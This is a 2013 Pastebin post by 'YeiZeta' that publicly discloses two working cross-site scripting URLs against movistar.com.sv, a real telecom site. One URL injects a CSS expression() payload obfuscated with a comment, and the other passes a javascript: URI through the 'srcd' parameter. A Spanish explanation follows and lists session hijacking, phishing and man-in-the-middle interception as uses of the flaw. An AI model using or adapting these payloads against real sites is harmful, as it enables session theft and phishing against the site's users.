Advertisement
YeiZeta

(Xss/JavaScript)(Movistar Salvador) movistar.com.sv

Jan 21st, 2013
436
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.89 KB | None | 0 0
  1. Yei zeta post
  2.  
  3. http://www.movistar.com.sv/sv/root/partic_inter_35g.aspx?srcd=/%22%20stYle=%22x:expre/**/ssion(alert(9))(yeizeta report)
  4. http://www.movistar.com.sv/sv/root/partic_movil_servicios.aspx?srcd=javascript:alert%289%29
  5.  
  6.  
  7. XSS (Cross-site Scripting) permite a un atacante ejecutar un script dinámico (JavaScript, VBScript) en el contexto de la aplicación. Esto permite varias posibilidades de ataque diferentes, en su mayoría secuestro de la sesión actual del usuario o cambiar la apariencia de la página, cambiando el código HTML sobre la marcha para robar las credenciales del usuario. Esto sucede porque la entrada introducida por un usuario se ha interpretado como HTML / Javascript / VbScript por el navegador.
  8.  
  9. Que puedo hacer con esta falla?
  10.  
  11. Hi-jacking sesión activa de los usuarios.
  12. Montaje de los ataques de phishing.
  13. Intercepción de datos y realizar man-in-the-middle.
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement